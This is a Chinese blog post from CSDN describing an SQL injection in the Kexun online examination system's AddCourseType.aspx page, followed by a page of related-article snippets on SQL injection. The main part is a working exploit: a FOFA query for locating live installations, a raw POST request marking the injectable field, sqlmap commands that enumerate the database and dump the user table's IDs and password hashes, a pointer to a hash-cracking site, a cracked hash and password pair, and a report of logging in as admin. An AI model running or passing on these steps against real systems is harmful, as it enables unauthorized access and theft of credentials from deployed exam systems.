记一次SQL注入漏洞获取管理员账号密码

已于 2024-08-29 09:31:05 修改
阅读量167 收藏 1
点赞数 4
文章标签: sql 安全 web安全
于 2024-08-29 09:30:30 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2301_77012231/article/details/141666610
版权

一、漏洞描述

 科迅网上考试系统 /Management/AddCourseType.aspx接口Name参数存在SQL注入漏洞

二、影响范围

 科迅网上考试系统

三、fofa查询

body="欢迎使用科迅网上考试系统"

四、漏洞检测

POC

POST /Management/AddCourseType.aspx HTTP/1.1
Host: 
Content-Length: 347
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 Edg/128.0.0.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://127.0.0.1/Management/AddCourseType.aspx
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
Cookie: Hm_lvt_f8d0a8c400404989e195270b0bbf060a=1722057915,1724161841; ASP.NET_SessionId=blajqxgi5muyg022ye3rn1cs
Connection: keep-alive

__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKMTE3NzQyNTUyNWRk%2F7Hp0Q4xOhbh8E%2FGKSPBPcRdUwon9oaL19Jnv4qQaMk%3D&__VIEWSTATEGENERATOR=C7764A33&__EVENTVALIDATION=%2FwEdAAOd59KI4MZ%2Bgo%2FmA1sXVDlV3nwmuJoxL7yCdENqmQn8N5ZYgDymPir0Zp4mFYzbkIggG1rfQ8Mi%2BkoQ5a%2B9befIlpw%2FsZ9Cvs%2Fn2lgFrt0%2BWQ%3D%3D&typeName=1*&btnSave=%E4%BF%9D+%E5%AD%98

五、漏洞利用 

使用SQLmap进行漏洞利用

获取当前数据库名称

python sqlmap.py -r cnvd.txt --current-db

 

获取当前数据库表名  这里一般都是找user表 

python sqlmap.py -r cnvd.txt -D ExamSystem --tables

获取当前数据库列名

python sqlmap.py -r cnvd.txt -D ExamSystem -T User_UserInfo --column

获取当前数据库字段

python sqlmap.py -r cnvd.txt -D ExamSystem -T User_UserInfo -C  UserId,Pwd -dump

可以使用https://cmd5.com/ 对加密的密码解密

50C215BB3B599960/123456

获取账号密码后成功登录

马船长
关注
  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
sql注入获取网站后台管理员账号与密码
longanquan的博客
07-27 1万+
利用联合查询获取cms 网站后台管理员帐密 环境介绍 物理机:Firefox浏览器(上加入hackbar插件) win2008虚拟机:搭建有cms网站(不会搭建的可以看我前面的博客) 判断网站是否存在sql注入漏洞 我们用物理机的Firefox浏览器访问虚拟机上的cms网站,F12打开开发者工具,在后面可以看到hackbar工具,点到该工具窗口。 首先我们先用最简单的方法判断是否存在漏洞。我们需要把地址框中的内容复制到hackbar框中,更改id的值,如果数据库中的内容回显到网页中,说明存在漏洞。 很
安全】【SQL注入漏洞】通过sql注入获取数据库管理员密码
little_stupid_child的专栏
01-21 7807
本博客中使用封神台靶标系统进行演示,靶标系统网站。 一、判断网站是否存在sql注入漏洞 1.在地址栏写入?id=1 and 1=1,回车 页面返回正常。 2.在地址栏写入?id=1 and 1=2,回车 页面返回异常,这里可能存在sql注入漏洞。 二、判断字段数 1.在地址栏写入?id=1 and 1=1 order by 3 页面返回异常,表的字段数小于3 2.在地址栏写入?id=1 and 1=1 order by 2 页面返回正常,说明表的字段数为2。 三、获取回显点 在地址栏写入?id=1
sql注入详解
热门推荐
越努力 越自由
05-05 20万+
SQL注入SQL Injection)是一种常见的Web安全漏洞,主要形成的原因是在数据交互中,前端的数据传入到后台处理时,没有做严格的判断,导致其传入的“数据”拼接到SQL语句中后,被当作SQL语句的一部分执行。 从而导致数据库受损(被脱库、被删除、甚至整个服务器权限陷)。 即:注入产生的原因是后台服务器接收相关参数未经过滤直接带入数据库查询...
一次SQL注入的收获
蚁景网安学院
10-19 3179
这是一篇两年前的笔了。之前平常喜欢看些电影影片,不想充值VIP,才发现的网站,但是这个网站A并不是主要测试的,而是通过发现他的兄弟网站B,然后进行渗透。
通过SQL注入拿到管理员密码
qq_52337463的博客
01-14 4183
该靶场来自于(封神台封神台 - 掌控安全在线演练靶场,是一个在线黑客攻防演练平台。 首先我们看下题目 题目是通过SQL注入拿到管理员后台密码 我们先点开"传送门"打开靶场 靶场已经打开了,我们先点"点击查看新闻"打开页面 看起来没啥有用的信息但是别慌,我们先进行SQL注入 在URL中***/?id=1 后面写命令进行注入 and 1=2 union select 1,concat(username,',',password) from admin 这里的admin...
网络安全web攻防 sql注入 XFF注入获取网站管理员账号密码
网络安全领域优质创作者
10-24 1319
XFF,是X-Forwarded-for的缩写,XFF注入是SQL注入的一种,该注入原理是通过修改X-Forwarded-for头对带入系统的dns进行sql注入,从而得到网站的数据库内容。 漏洞前提:HTTP Header中存在X-Forwarded-for参数的调用。 检测方法:通过火狐的插件X-Forwarded-for header 1.0.1.1进行对本地IP地址进行修改,为其带入的...
通过SQL手工注入拿到管理员密码--辛巴猫舍
ningmini的博客
05-20 1968
通过SQL手工注入拿到管理员密码–辛巴猫舍 靶场地址: http://rhiq8003.ia.aqlab.cn/ 点击新闻页面看看 域名后面加上了id=1,说明存在着数据库的交互 那么这里就很有可能是注入点 把这个作为我们的目标url:http://rhiq8003.ia.aqlab.cn/?id=1 进入手工注入步骤 第一步 判断是否存在SQL注入漏洞 构造and 1=1,这个语句是恒成立的,一般页面都是不报错的 再来试试1=2 出错,初步说明存在着注入漏洞 第二步 判断数据库字段数 在这里会使用
Web安全 SQL注入漏洞 工具测试.
网络安全领域___专研者.
02-13 7088
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。
注入漏洞sql注入漏洞
这里记录着我一点一滴的进步
01-14 1938
注入漏洞 1 SQL注入 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行指定的SQL语句。具体来说,它是利用现有应用程序,将SQL语句注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入SQL语句得到一个存在安全漏洞的网站上的数据,而不是按照设计者意图去执行SQL语句。 1.1 SQL注入的概念 (1)SQ...
实战 - 畅捷CRM get_usedspace.php SQL注入漏洞
HAKUNAMATATATTA的博客
04-25 344
畅捷CRM get_usedspace.php存在SQL漏洞,通过漏洞获取数据库敏感信息。
SQL注入漏洞演示源代码
05-23
SQL注入漏洞是网络安全领域中的一个重要话题,它涉及到数据库管理和Web应用程序的设计。此“SQL注入漏洞演示源代码”提供了一个实际的示例,帮助我们理解这种漏洞的原理和防范方法。 SQL注入是一种攻击技术,攻击者...
三步堵死 SQL Server注入漏洞
09-11
例如,可以通过设置管理员账号的权限来让软件检测到假象,而真正的管理员账号密码则可以隐藏起来。 第三步:设置防止注入账号 设置防止注入账号是防御 SQL 注入漏洞的第三步。可以通过设置两个账号,一个是普通的...
信息收集、sql注入获取DC3网站后台管理员账号密码
longanquan的博客
07-29 1059
环境介绍 物理机(装有nmap工具) DC3靶机(简单点说就是一个无图形界面的Linux系统,打开这个系统不能进行任何操作。这个系统里有一个网站) kali虚拟机(装有joomscan、SQLmap等工具) 获取DC3的IP地址 由于DC3上不能进行任何操作,所以我们需要用其他手段获取它的ip地址。打开DC3的虚拟网卡,点高级,就能看到DC3的MAC地址 由于是桥接模式,物理机跟DC3在同一网段,利用物理机上的nmap工具对此网段进行扫描,对比结果不难找到与这个MAC地址对应的ip地址,这样就获取到了DC
SpringBoot项目中mybatis执行sql很慢的排查改造过程(Interceptor插件、fetchSize、隐式转换等)
最新发布
星月昭铭的博客
08-29 926
刚入职公司,就发现公司项目跑sql特别慢,差不多一万条数据插入到数据库要5秒以上(没有听错,就是这个速度),查询修改删除也是特别慢。直到22年年底实在是受不了了,我就去排查了一下。用的是Oracle数据库,mybatis、mybatis plus,其中mybatis是引入的平台的依赖。平台封装了一些工具和插件。
PostgreSQL:后端开发者的瑞士军刀
m0_52796585的博客
08-25 1897
PostgreSQL是一个功能丰富、高度可扩展的数据库系统,它为后端开发者提供了强大的工具来构建复杂的数据解决方案。从基础的SQL操作到高级的性能优化和安全特性,PostgreSQL都是后端开发者的可靠伙伴。随着你在使用PostgreSQL的过程中不断学习和实践,你会发现它是一个真正的瑞士军刀,能够满足你在后端开发中的各种需求。
PostgreSQL遍历所有的表并为其创建基于某个字段的索引
致力于互联网、物联网领域知识内容分享
08-29 304
以下以"collect_time"字段为例,其他字段请自行全局替换。
Hive SQL
08-26 1124
tinyint 1byte 有符号整数smallint 2byte 有符号整数int 4byte 有符号整数bigint 8byte 有符号整数boolean 布尔类型,true或者falsefloat 单精度浮点数double 双精度浮点数decimal 十进制精准数字类型 decimal(16,2)
PostgreSQL-物理备份工具PGbackrest使用教程
侯晓阳的博客
08-27 383
PGSQL非常强大的物理备份工具,pgbackrest,支持增量、压缩、从库备份远程备份、加密备份等。
PostgreSQL如何设置主键自增(序列、SERIAL)
西京刀客
08-26 1091
在使用Mysql时,创建表结构时可以通过关键字auto_increment来指定主键是否自增。但在Postgresql数据库中,虽然可以实现字段的自增,但从本质上来说却并不支持Mysql那样的自增。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值